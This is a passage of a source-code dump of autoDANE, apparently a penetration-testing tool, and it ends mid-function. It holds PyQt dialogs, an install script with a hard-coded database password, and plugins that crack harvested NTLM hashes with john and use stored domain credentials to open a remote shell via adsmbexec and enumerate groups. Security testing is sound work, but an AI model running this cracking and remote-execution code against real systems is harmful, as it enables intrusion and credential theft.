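        # Preserve the original rejection of the all-255 address.
        return any(value != 255 for value in octets)

    @pyqtSignature("")
    def on_btnOK_clicked(self):
        """Accept the dialog for a valid address, otherwise tell the user why not."""
        if self.valid():
            self.accept()
        else:
            QMessageBox.information(self, "Information", "That's not a valid IP")

    @pyqtSignature("")
    def on_btnCancel_clicked(self):
        """Dismiss the dialog without accepting the input."""
        self.reject()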
33 |
--------------------------------------------------------------------------------
/inputwindows/addhost.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 465
10 | 151
11 |
12 |
13 |
14 | Add Host
15 |
16 |
17 | true
18 |
19 |
20 | -
21 |
22 |
-
23 |
24 |
-
25 |
26 |
27 | IP Address
28 |
29 |
30 |
31 | -
32 |
33 |
34 |
35 |
36 | -
37 |
38 |
39 | Qt::Vertical
40 |
41 |
42 |
43 | 20
44 | 40
45 |
46 |
47 |
48 |
49 | -
50 |
51 |
-
52 |
53 |
54 | Qt::Horizontal
55 |
56 |
57 |
58 | 40
59 | 20
60 |
61 |
62 |
63 |
64 | -
65 |
66 |
67 | OK
68 |
69 |
70 |
71 | -
72 |
73 |
74 | Cancel
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
--------------------------------------------------------------------------------
/inputwindows/addport.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | from PyQt4.QtCore import pyqtSignature
4 | from PyQt4.QtGui import QDialog
5 |
6 | from .Ui_addport import Ui_Dialog
7 |
8 |
class AddPort(QDialog, Ui_Dialog):
    """Dialog for entering a port number; it adds no validation of its own."""

    def __init__(self, parent=None):
        QDialog.__init__(self, parent)
        # Builds the generated widgets and auto-connects the on_*_clicked slots below.
        self.setupUi(self)

    @pyqtSignature("")
    def on_btnOK_clicked(self):
        """Accept the dialog as-is."""
        # NOTE(review): addport.ui lists 65535 as a property value, presumably
        # the input widget's maximum. If so the widget bounds the port; confirm.
        self.accept()

    @pyqtSignature("")
    def on_btnCancel_clicked(self):
        """Dismiss the dialog without accepting the input."""
        self.reject()
21 |
--------------------------------------------------------------------------------
/inputwindows/addport.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 478
10 | 164
11 |
12 |
13 |
14 | New Port
15 |
16 |
17 | true
18 |
19 |
20 | -
21 |
22 |
-
23 |
24 |
25 |
26 | 100
27 | 16777215
28 |
29 |
30 |
31 | Port Number
32 |
33 |
34 |
35 | -
36 |
37 |
38 | 65535
39 |
40 |
41 |
42 |
43 |
44 | -
45 |
46 |
47 | Qt::Vertical
48 |
49 |
50 |
51 | 20
52 | 73
53 |
54 |
55 |
56 |
57 | -
58 |
59 |
-
60 |
61 |
62 | Qt::Horizontal
63 |
64 |
65 |
66 | 40
67 | 20
68 |
69 |
70 |
71 |
72 | -
73 |
74 |
75 | OK
76 |
77 |
78 |
79 | -
80 |
81 |
82 | Cancel
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
--------------------------------------------------------------------------------
/inputwindows/confirmation.py:
--------------------------------------------------------------------------------
1 | from PyQt4.QtCore import pyqtSignature
2 | from PyQt4.QtGui import QDialog
3 | from PyQt4 import QtGui, QtCore
4 | from PyQt4.QtCore import QString
5 |
6 | from .Ui_confirmation import Ui_Dialog
7 |
8 |
class wndConfirmation(QDialog, Ui_Dialog):
    """Yes/No confirmation dialog that shows images/confirm.png next to the prompt."""

    def __init__(self, parent=None):
        QDialog.__init__(self, parent)
        self.setupUi(self)

        # The path is relative, so it resolves against the process working directory.
        image = QtGui.QPixmap(QString.fromUtf8('images/confirm.png'))
        target_size = self.lblImage.size()
        self.lblImage.setPixmap(image.scaled(target_size, QtCore.Qt.KeepAspectRatio))

    @pyqtSignature("")
    def on_btnYes_clicked(self):
        """Close the dialog with an accepted result."""
        self.accept()

    @pyqtSignature("")
    def on_btnNo_clicked(self):
        """Close the dialog with a rejected result."""
        self.reject()
25 |
--------------------------------------------------------------------------------
/inputwindows/confirmation.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 485
10 | 275
11 |
12 |
13 |
14 | Confirmation
15 |
16 |
17 | true
18 |
19 |
20 | true
21 |
22 |
23 | -
24 |
25 |
-
26 |
27 |
28 |
29 | 221
30 | 221
31 |
32 |
33 |
34 |
35 | 221
36 | 221
37 |
38 |
39 |
40 | ?
41 |
42 |
43 |
44 | -
45 |
46 |
47 | Are you sure?
48 |
49 |
50 |
51 |
52 |
53 | -
54 |
55 |
56 | Yes
57 |
58 |
59 |
60 | -
61 |
62 |
63 | No
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
--------------------------------------------------------------------------------
/inputwindows/newtask.py:
--------------------------------------------------------------------------------
1 | from PyQt4.QtCore import pyqtSignature
2 | from PyQt4.QtGui import QDialog, QMessageBox
3 |
4 | from .Ui_newtask import Ui_Dialog
5 |
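class NewTask(QDialog, Ui_Dialog):
    """Dialog for describing a new task: category, name, description and file name.

    NOTE(review): validate() only checks that the fields are non-empty. If the
    file name is later used to locate a script on disk, the consumer should
    confine it to the expected directory; that code is not visible here.
    """

    # Database connection. setup() dereferences it, so it has to be assigned
    # on the instance before setup() is called.
    db = None

    def __init__(self, parent=None):
        QDialog.__init__(self, parent)
        self.setupUi(self)

    def setup(self):
        """Fill the category combo box from task_categories, with a leading blank entry."""
        cursor = self.db.cursor()
        try:
            cursor.execute("select category from task_categories")
            items = [""] + [row[0] for row in cursor.fetchall()]
        finally:
            # Close the cursor even when the query fails.
            cursor.close()
        self.cmbCategory.addItems(items)

    def validate(self):
        """Return True when category, name, description and file name are all non-empty."""
        return bool(
            self.cmbCategory.currentText() != ""
            and self.txtName.text() != ""
            and self.txtDescription.toPlainText() != ""
            and self.txtFileName.text() != ""
        )

    @pyqtSignature("")
    def on_btnSave_clicked(self):
        """Accept the dialog when every field is filled in, else inform the user."""
        if self.validate():
            self.accept()
        else:
            QMessageBox.information(self, "Information", "You need to fill in all the fields")

    @pyqtSignature("")
    def on_btnCancel_clicked(self):
        """Dismiss the dialog without accepting the input."""
        self.reject()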
40 |
--------------------------------------------------------------------------------
/inputwindows/newtask.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 414
10 | 389
11 |
12 |
13 |
14 | New Task
15 |
16 |
17 | true
18 |
19 |
20 | -
21 |
22 |
-
23 |
24 |
-
25 |
26 |
27 |
28 | 110
29 | 0
30 |
31 |
32 |
33 |
34 | 110
35 | 16777215
36 |
37 |
38 |
39 | Category
40 |
41 |
42 |
43 | -
44 |
45 |
46 |
47 |
48 | -
49 |
50 |
-
51 |
52 |
53 |
54 | 110
55 | 0
56 |
57 |
58 |
59 |
60 | 110
61 | 16777215
62 |
63 |
64 |
65 | Name
66 |
67 |
68 |
69 | -
70 |
71 |
72 |
73 |
74 | -
75 |
76 |
-
77 |
78 |
79 |
80 | 110
81 | 0
82 |
83 |
84 |
85 |
86 | 110
87 | 16777215
88 |
89 |
90 |
91 | Description
92 |
93 |
94 |
95 | -
96 |
97 |
98 |
99 |
100 | -
101 |
102 |
-
103 |
104 |
105 |
106 | 110
107 | 0
108 |
109 |
110 |
111 |
112 | 110
113 | 16777215
114 |
115 |
116 |
117 | File Name
118 |
119 |
120 |
121 | -
122 |
123 |
124 |
125 |
126 | -
127 |
128 |
-
129 |
130 |
131 |
132 | 110
133 | 0
134 |
135 |
136 |
137 |
138 | 110
139 | 16777215
140 |
141 |
142 |
143 | Uses Metasploit
144 |
145 |
146 |
147 | -
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 | -
157 |
158 |
-
159 |
160 |
161 |
162 | 110
163 | 0
164 |
165 |
166 |
167 |
168 | 110
169 | 16777215
170 |
171 |
172 |
173 | Is Recursive
174 |
175 |
176 |
177 | -
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 | -
187 |
188 |
-
189 |
190 |
191 |
192 | 110
193 | 0
194 |
195 |
196 |
197 |
198 | 110
199 | 16777215
200 |
201 |
202 |
203 | Enabled
204 |
205 |
206 |
207 | -
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 | -
217 |
218 |
219 | Qt::Vertical
220 |
221 |
222 |
223 | 20
224 | 40
225 |
226 |
227 |
228 |
229 |
230 |
231 | -
232 |
233 |
-
234 |
235 |
236 | Save
237 |
238 |
239 |
240 | -
241 |
242 |
243 | Cancel
244 |
245 |
246 |
247 |
248 |
249 |
250 |
251 |
252 |
253 |
254 |
--------------------------------------------------------------------------------
/inputwindows/newtrigger.py:
--------------------------------------------------------------------------------
1 | from PyQt4.QtCore import pyqtSignature
2 | from PyQt4.QtGui import QDialog, QMessageBox
3 |
4 | from .Ui_newtrigger import Ui_Dialog
5 |
6 |
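class NewTrigger(QDialog, Ui_Dialog):
    """Dialog that links a trigger and a value mask to a task and stores the link.

    All SQL here uses driver-side parameter binding (``%s`` placeholders with
    a tuple), so the free-text value mask is never spliced into the statement.
    """

    # Database connection. setup() and the slots dereference it, so it has to
    # be assigned on the instance before setup() is called.
    db = None

    # Class-level defaults kept for code that reads them from the class. The
    # working copies are created per instance in __init__: the original
    # mutated these shared dicts, so rows loaded by one dialog leaked into the
    # lookup tables of every later dialog.
    categories = {"": -1}
    triggers = {"": -1}
    tasks = {"": -1}

    def __init__(self, parent=None):
        QDialog.__init__(self, parent)
        # Name -> id lookups; "" maps to -1 for the blank combo box entry.
        self.categories = {"": -1}
        self.triggers = {"": -1}
        self.tasks = {"": -1}
        self.setupUi(self)

    def setup(self):
        """Load categories and triggers from the database into their combo boxes."""
        self.cmbCategory.addItem("")
        cursor = self.db.cursor()
        try:
            cursor.execute("select id, category from task_categories")
            for row in cursor.fetchall():
                self.categories[row[1]] = row[0]
                self.cmbCategory.addItem(row[1])
        finally:
            cursor.close()

        self.cmbTriggers.addItem("")
        cursor = self.db.cursor()
        try:
            cursor.execute("select id, trigger_name from trigger_descriptions")
            for row in cursor.fetchall():
                self.triggers[row[1]] = row[0]
                self.cmbTriggers.addItem(row[1])
        finally:
            cursor.close()

    def validate(self):
        """Return True when trigger, value mask, category and task are all non-empty."""
        return bool(
            self.cmbTriggers.currentText() != ""
            and self.txtValueMask.text() != ""
            and self.cmbCategory.currentText() != ""
            and self.cmbTasks.currentText() != ""
        )

    @pyqtSignature("")
    def on_btnSave_clicked(self):
        """Insert the trigger event and accept the dialog, or ask for missing fields."""
        if not self.validate():
            QMessageBox.information(self, "Information", "You need to fill in all the fields")
            return

        sql = "insert into trigger_events (trigger_descriptions_id, task_descriptions_id, value_mask, enabled) values (%s, %s, %s, %s)"
        trigger_id = self.triggers[str(self.cmbTriggers.currentText())]
        task_id = self.tasks[str(self.cmbTasks.currentText())]
        cursor = self.db.cursor()
        try:
            # NOTE(review): no commit is issued here; presumably the connection
            # autocommits or the caller commits. Confirm.
            cursor.execute(sql, (trigger_id, task_id, str(self.txtValueMask.text()), self.cbxEnabled.isChecked(), ))
        finally:
            cursor.close()
        self.accept()

    @pyqtSignature("")
    def on_btnCancel_clicked(self):
        """Dismiss the dialog without saving."""
        self.reject()

    @pyqtSignature("int")
    def on_cmbCategory_currentIndexChanged(self, index):
        """Reload the task combo box with the tasks of the selected category."""
        self.tasks = {"": -1}
        self.cmbTasks.clear()
        self.cmbTasks.addItem("")
        sql = "select id, task_name from task_descriptions where task_categories_id = %s"
        cursor = self.db.cursor()
        try:
            cursor.execute(sql, (self.categories[str(self.cmbCategory.currentText())], ))
            for row in cursor.fetchall():
                self.tasks[row[1]] = row[0]
                self.cmbTasks.addItem(row[1])
        finally:
            # The original never closed this cursor.
            cursor.close()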
69 |
--------------------------------------------------------------------------------
/inputwindows/newtrigger.py2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/inputwindows/newtrigger.py2
--------------------------------------------------------------------------------
/inputwindows/newtrigger.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 385
10 | 260
11 |
12 |
13 |
14 | New Event
15 |
16 |
17 | true
18 |
19 |
20 | -
21 |
22 |
-
23 |
24 |
-
25 |
26 |
27 |
28 | 110
29 | 0
30 |
31 |
32 |
33 |
34 | 110
35 | 16777215
36 |
37 |
38 |
39 | Trigger
40 |
41 |
42 |
43 | -
44 |
45 |
46 |
47 |
48 | -
49 |
50 |
-
51 |
52 |
53 |
54 | 110
55 | 0
56 |
57 |
58 |
59 |
60 | 110
61 | 16777215
62 |
63 |
64 |
65 | Value Mask
66 |
67 |
68 |
69 | -
70 |
71 |
72 |
73 |
74 | -
75 |
76 |
-
77 |
78 |
79 |
80 | 110
81 | 0
82 |
83 |
84 |
85 |
86 | 110
87 | 16777215
88 |
89 |
90 |
91 | Task Category
92 |
93 |
94 |
95 | -
96 |
97 |
98 |
99 |
100 | -
101 |
102 |
-
103 |
104 |
105 |
106 | 110
107 | 0
108 |
109 |
110 |
111 |
112 | 110
113 | 16777215
114 |
115 |
116 |
117 | Task Name
118 |
119 |
120 |
121 | -
122 |
123 |
124 |
125 |
126 | -
127 |
128 |
-
129 |
130 |
131 |
132 | 110
133 | 0
134 |
135 |
136 |
137 |
138 | 110
139 | 16777215
140 |
141 |
142 |
143 | Enabled
144 |
145 |
146 |
147 | -
148 |
149 |
150 |
151 |
152 |
153 | true
154 |
155 |
156 |
157 |
158 |
159 | -
160 |
161 |
162 | Qt::Vertical
163 |
164 |
165 |
166 | 20
167 | 40
168 |
169 |
170 |
171 |
172 |
173 |
174 | -
175 |
176 |
-
177 |
178 |
179 | Save
180 |
181 |
182 |
183 | -
184 |
185 |
186 | Cancel
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
--------------------------------------------------------------------------------
/inputwindows/textinput.py:
--------------------------------------------------------------------------------
1 | from PyQt4.QtCore import pyqtSignature
2 | from PyQt4.QtGui import QDialog, QMessageBox
3 |
4 | from .Ui_textinput import Ui_Dialog
5 |
6 |
class wndTextInput(QDialog, Ui_Dialog):
    """Dialog that asks for a domain and a loot file name."""

    def __init__(self, parent=None):
        QDialog.__init__(self, parent)
        self.setupUi(self)

    @pyqtSignature("")
    def on_btnOk_clicked(self):
        """Accept the dialog only when both text fields are filled in."""
        field_missing = self.txtDomain.text() == "" or self.txtLootFileName.text() == ""
        if not field_missing:
            self.accept()
            return
        QMessageBox.information(self, "Information", "You need to fill in both fields")

    @pyqtSignature("")
    def on_btnCancel_clicked(self):
        """Dismiss the dialog without accepting the input."""
        self.reject()
22 |
--------------------------------------------------------------------------------
/inputwindows/textinput.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 423
10 | 172
11 |
12 |
13 |
14 | Dialog
15 |
16 |
17 | true
18 |
19 |
20 | -
21 |
22 |
-
23 |
24 |
-
25 |
26 |
27 |
28 | 75
29 | 0
30 |
31 |
32 |
33 | Domain
34 |
35 |
36 |
37 | -
38 |
39 |
40 |
41 |
42 | -
43 |
44 |
-
45 |
46 |
47 |
48 | 75
49 | 0
50 |
51 |
52 |
53 | Loot File
54 |
55 |
56 |
57 | -
58 |
59 |
60 |
61 |
62 | -
63 |
64 |
65 | Qt::Vertical
66 |
67 |
68 |
69 | 20
70 | 40
71 |
72 |
73 |
74 |
75 | -
76 |
77 |
-
78 |
79 |
80 | Qt::Horizontal
81 |
82 |
83 |
84 | 40
85 | 20
86 |
87 |
88 |
89 |
90 | -
91 |
92 |
93 | OK
94 |
95 |
96 |
97 | -
98 |
99 |
100 | Cancel
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
--------------------------------------------------------------------------------
/install:
--------------------------------------------------------------------------------
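#!/bin/bash
# Installs the system packages, Python modules, wkhtmltox and the PostgreSQL
# database used by autoDANE. The script uses relative paths (createdb.sql,
# createdbstructure.sql, temp/, logs/), so run it from the directory that
# holds those files. apt-get and the copies into /usr need root.

apt-get install -y msgpack-python python-twisted python-pip wkhtmltopdf libssl-dev libffi-dev python-dev build-essential

# NOTE(review): none of these packages is pinned to a version or hash, so each
# install takes whatever the index serves at that moment.
pip install netifaces
pip install docxtpl
pip install impacket
pip install crackmapexec

# Cloned over https:// rather than git://, which offers neither transport
# integrity nor server authentication.
git clone https://github.com/SpiderLabs/msfrpc.git msfrpc
# Subshell with &&: if the clone failed, the remaining steps still run from
# the original directory instead of two levels above it.
( cd msfrpc/python-msfrpc/ && python setup.py install )
rm -r msfrpc/

# NOTE(review): the archive is fetched over plain HTTP and unpacked into /usr
# without an integrity check. Pin a digest and verify before extracting, e.g.
#   echo "<EXPECTED_SHA256>  wkhtmltox-0.12.3_linux-generic-amd64.tar.xz" | sha256sum -c -
wget http://download.gna.org/wkhtmltopdf/0.12/0.12.3/wkhtmltox-0.12.3_linux-generic-amd64.tar.xz
tar -xvf wkhtmltox-0.12.3_linux-generic-amd64.tar.xz
cp -r wkhtmltox/bin/* /usr/bin/
cp -r wkhtmltox/include/* /usr/include/
cp -r wkhtmltox/lib/* /usr/lib/
cp -r wkhtmltox/share/* /usr/share/
rm -r wkhtmltox/

service postgresql start
# NOTE(review): the database password is hard-coded and published with the
# repository, so every installation shares it. It is left unchanged here
# because the application's own connection settings are not part of this
# script; replace both together with a per-install secret.
sudo -u postgres bash -c "psql -c \"create user autodane with password 'OHZdz7CW8Lv4PCa';\""
sudo -u postgres bash -c "psql < createdb.sql"
sudo -u postgres bash -c "psql autodane < createdbstructure.sql"
sudo -u postgres bash -c "psql autodane -c \"grant all privileges on all tables in schema public to autodane\""
sudo -u postgres bash -c "psql autodane -c \"grant all privileges on all sequences in schema public to autodane\""

# -p keeps a re-run from failing on existing directories. Plugins write
# credential material and tool output under temp/, so both directories are
# restricted to the installing user.
mkdir -p temp
mkdir -p logs
chmod 700 temp logs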
33 |
--------------------------------------------------------------------------------
/main/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/main/__init__.py
--------------------------------------------------------------------------------
/msf/.exploit.py.swn:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/msf/.exploit.py.swn
--------------------------------------------------------------------------------
/msf/.exploit.py.swo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/msf/.exploit.py.swo
--------------------------------------------------------------------------------
/msf/.exploit.py.swp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/msf/.exploit.py.swp
--------------------------------------------------------------------------------
/msf/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/msf/__init__.py
--------------------------------------------------------------------------------
/plugins/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/__init__.py
--------------------------------------------------------------------------------
/plugins/domain_enumeration/.buenumerate_users_and_groups.py.swp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/domain_enumeration/.buenumerate_users_and_groups.py.swp
--------------------------------------------------------------------------------
/plugins/domain_enumeration/.enumerate_groups.py.swo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/domain_enumeration/.enumerate_groups.py.swo
--------------------------------------------------------------------------------
/plugins/domain_enumeration/.enumerate_groups.py.swp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/domain_enumeration/.enumerate_groups.py.swp
--------------------------------------------------------------------------------
/plugins/domain_enumeration/.enumerate_users.py.swo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/domain_enumeration/.enumerate_users.py.swo
--------------------------------------------------------------------------------
/plugins/domain_enumeration/.enumerate_users.py.swp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/domain_enumeration/.enumerate_users.py.swp
--------------------------------------------------------------------------------
/plugins/domain_enumeration/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/domain_enumeration/__init__.py
--------------------------------------------------------------------------------
/plugins/domain_enumeration/bruteforce_ntlm_hashes.py:
--------------------------------------------------------------------------------
1 | import os
2 |
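def run(params):
    """Run john against the stored NTLM hashes of the current footprint.

    Writes the footprint's known cleartext passwords to one temp file (used
    as the wordlist) and its ``domain$username:ntlm_hash`` lines to another,
    runs john three times (wordlist, 300-second default run, ``--show``) and
    passes every recovered password to ``addDomainCreds``.

    NOTE(review): both temp files hold credential material and are left on
    disk when the function returns; nothing in this block removes them.
    """
    known_passwords_fn = "temp/{0}".format(params.getRandomFileName())
    unknown_hashes_fn = "temp/{0}".format(params.getRandomFileName())

    def _open_private(path):
        # Create the file with mode 0600 so other local users cannot read
        # the passwords and hashes written below.
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
        return os.fdopen(fd, 'w')

    cursor = params.db.cursor()
    cursor.execute("""select cleartext_password from domain_credentials where footprint_id = %s and cleartext_password != '' """, (params.footprint_id, ))
    #cursor.execute("""select cleartext_password from domain_credentials where footprint_id = %s and cleartext_password != "" """, (params.footprint_id, ))
    known_rows = cursor.fetchall()
    cursor.close()
    with _open_private(known_passwords_fn) as fh:
        for row in known_rows:
            fh.write(row[0] + "\n")

    cursor = params.db.cursor()
    #Including know password/hash combos will feed the john.pot file with creds from memory, which might otherwise have been difficult to recover
    cursor.execute("""select domain, username, ntlm_hash from domain_credentials where footprint_id = %s and ntlm_hash != '' """, (params.footprint_id, ))
    #cursor.execute("""select domain, username, ntlm_hash from domain_credentials where footprint_id = %s and cleartext_password = "" and ntlm_hash != "" """, (params.footprint_id, ))
    hash_rows = cursor.fetchall()
    cursor.close()
    with _open_private(unknown_hashes_fn) as fh:
        for row in hash_rows:
            fh.write("{0}${1}:{2}\n".format(row[0], row[1], row[2]))

    # close() waits for the child to exit; the original relied on the
    # discarded popen object being collected to get the same effect.
    cmd = "john {0} --format=NT --wordlist={1}".format(unknown_hashes_fn, known_passwords_fn)
    os.popen(cmd).close()
    #params.log(cmd)

    cmd = "timeout 300 john {0} --format=NT".format(unknown_hashes_fn)
    os.popen(cmd).close()
    #params.log(cmd)

    cmd = "john {0} --format=NT --show".format(unknown_hashes_fn)
    pipe = os.popen(cmd)
    output = pipe.read()
    pipe.close()
    # NOTE(review): the --show output contains cleartext passwords and is
    # written to the task log as-is.
    params.log(cmd)
    params.log("")
    params.log(output)

    for row in output.split("\n"):
        if row == "" or row.find("password hashes cracked, ") != -1:
            continue

        # Expected shape: domain$username:password[:...]. Any other line is
        # skipped instead of raising IndexError and aborting the task.
        parts = row.split("$")
        if len(parts) < 2:
            continue
        fields = parts[1].split(":")
        if len(fields) < 2:
            continue

        domain = parts[0]
        username = fields[0]
        password = fields[1]

        if password != "":
            cursor = params.db.cursor()
            cursor.execute("select addDomainCreds(%s, %s, %s, %s, %s, '', '')", (params.footprint_id, 0, domain, username, password, ))
            cursor.close()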
53 |
--------------------------------------------------------------------------------
/plugins/domain_enumeration/enumerate_groups.py:
--------------------------------------------------------------------------------
1 | import time
2 | import asyncproc
3 | import os
4 | import base64
5 | from msf import exploit
6 |
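def runCmd(proc, cmd):
    """Send *cmd* to the interactive process and return the output it produced.

    Writes the command followed by a newline, then polls ``proc`` every
    0.25 s until a chunk containing "windows" (compared case-insensitively)
    arrives; this code treats that chunk as the end of the output.

    Returns the concatenated output, or "" when no such chunk arrived within
    120 seconds.
    """
    proc.write(cmd + "\n")
    time.sleep(0.5)
    chunks = []

    startTime = time.time()
    while True:
        proc.wait(os.WNOHANG)  # non-blocking poll; the status is not used
        out = proc.read()
        time.sleep(0.25)

        if time.time() - startTime >= 120:
            print("too much time has passed. quitting")
            return ""

        if out != "":
            # Each chunk is appended once. The earlier `result += result + out`
            # re-added everything read so far whenever a new chunk arrived.
            chunks.append(out)
            if "WINDOWS" in out.upper():
                break
    return "".join(chunks)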
28 |
def run(params):
    """Collect the group names of one domain and store them via addDomainGroup.

    Picks one row (domain id, host IP, domain, username, cleartext password,
    credential-map id) for the current footprint, registers a task-list item
    with task description 20, starts ./software/adsmbexec.py with those
    credentials and, once a chunk containing "windows" is read, sends
    ``dsquery group -limit 0`` and records each group name. The task status
    is updated at the end with the base64-encoded log queue contents.
    """
    sql = """
        select
        d.id,
        hd.ip_address,
        dc.domain, dc.username, dc.cleartext_password,
        m.id
        from
        domains d
        join domain_credentials dc on d.domain_name = dc.domain
        join domain_credentials_map m on m.domain_credentials_id = dc.id
        join host_data hd on m.host_data_id = hd.id
        where
        d.footprint_id = dc.footprint_id and
        d.footprint_id = hd.footprint_id and
        d.footprint_id = m.footprint_id and
        m.valid = true and
        d.info_gathered = false and
        m.psexec_failed = false and
        m.dgu_failed = false and
        d.id not in (select item_identifier from task_list where task_descriptions_id = 20 and footprint_id = %s and in_progress = true) and
        hd.footprint_id = %s order by username limit 1
        """

    cursor = params.db.cursor()
    cursor.execute(sql, (params.footprint_id, params.footprint_id, ))
    row = cursor.fetchone()
    cursor.close()

    if row != None:
        # Register the work item; task_id is needed for the final status update.
        cursor = params.db.cursor()
        cursor.execute("select addTaskListItem(%s, 20, %s, true, false)", (params.footprint_id, row[0], ))
        task_id = cursor.fetchone()[0]
        cursor.close()

        log = ""
        # NOTE(review): row[4] is the cleartext password. It ends up in the
        # task log through params.log(cmd) and in the child's argv, where
        # other local users can read it from the process list while it runs.
        cmd = "./software/adsmbexec.py {}/{}:{}@{}".format(row[2],row[3],row[4],row[1])
        params.log(cmd)
        # The process itself is started from an argument list, not through a shell.
        proc = asyncproc.Process(["./software/adsmbexec.py", "{}/{}:{}@{}".format(row[2],row[3],row[4],row[1])])
        runWithDifferentUser = False
        gotShell = False
        startTime = time.time()
        # Poll the child for up to 60 seconds and classify its output.
        while True:
            poll = proc.wait(os.WNOHANG)
            out = proc.read()
            time.sleep(0.25)

            if time.time() - startTime >= 60:
                #print "too much time has passed. quitting"
                log = log + "too much time has passed. quitting" + "\r\n"
                params.log("too much time has passed. quitting")

                break

            if out != "":
                #print out
                log = log + out + "\r\n"
                params.log(out)
                if out.upper().find("Windows".upper()) > -1:
                    gotShell = True
                    break
                # The next four messages drop the process handle and flag the
                # credential mapping as unusable for this task.
                elif out.upper().find("STATUS_SHARING_VIOLATION".upper()) > -1:
                    proc = None
                    runWithDifferentUser = True
                    break
                elif out.upper().find("SMB SessionError".upper()) > -1:
                    proc = None
                    runWithDifferentUser = True
                    break
                elif out.upper().find("rpc_x_bad_stub_data".upper()) > -1:
                    proc = None
                    runWithDifferentUser = True
                    break
                elif out.upper().find("Unexpected answer from server".upper()) > -1:
                    proc = None
                    runWithDifferentUser = True
                    break
                # These two only set the flag; polling continues until another
                # branch breaks or the 60-second limit is reached.
                elif out.upper().find("The target principal name is incorrect".upper()) > -1:
                    runWithDifferentUser = True
                    # TODO update this host, set psexec_failed = true
                elif out.upper().find("'dsquery' is not recognized as an internal or external command".upper()) > -1:
                    runWithDifferentUser = True
        if runWithDifferentUser:
            # Exclude this credential mapping from later selections (dgu_failed).
            cursor = params.db.cursor()
            cursor.execute("update domain_credentials_map set dgu_failed = true where id = %s", (row[5], ))
            cursor.close()


        if gotShell:
            out = runCmd(proc, "dsquery group -limit 0")
            #for l in runCmd(proc, "dsquery group -limit 0").split("\n"):
            for l in out.split("\n"):
                #group = l.split(",")[0].split("=")[1],
                #print l
                log = log + l + "\r\n"
                params.log(l)

                if l.find("'dsquery' is not recognized as an internal or external command") != -1:
                    runWithDifferentUser = True
                    break

                if l != "":
                    # Value after the first "=" of the first comma-separated
                    # field; names containing "{" are skipped.
                    # NOTE(review): a line without "=" raises IndexError here.
                    if l.split(",")[0].split("=")[1].find("{") == -1:
                        #print "group [{}]".format(l.split(",")[0].split("=")[1],)
                        cursor = params.db.cursor()
                        cursor.execute("select addDomainGroup(%s, %s, %s)", (params.footprint_id, row[0], l.split(",")[0].split("=")[1], ))
                        cursor.close()
                else:
                    # The first empty line ends the parsing.
                    break
            time.sleep(0.5)

            proc.write("exit\n")
            time.sleep(2)

        if runWithDifferentUser == True:
            cursor = params.db.cursor()
            cursor.execute("update domain_credentials_map set dgu_failed = true where id = %s", (row[5], ))
            cursor.close()

        #print "output [{}]".format(out)
        # NOTE(review): `is not ""` compares identity with a literal, not
        # content; `!=` was presumably intended - confirm before changing.
        if out is not "":
            if not runWithDifferentUser:
                spCursor = params.db.cursor()
                spCursor.execute("update domains set info_gathered = true where id = %s", (row[0], ))
                spCursor.close()


        # Drain the log queue into one CRLF-joined string; the slice removes
        # the trailing "\r\n".
        final_output = ""
        while params.log_queue.empty() == False:
            final_output += "{0}\r\n".format(params.log_queue.get(False))
        final_output = final_output[:-2]

        spCursor = params.db.cursor()
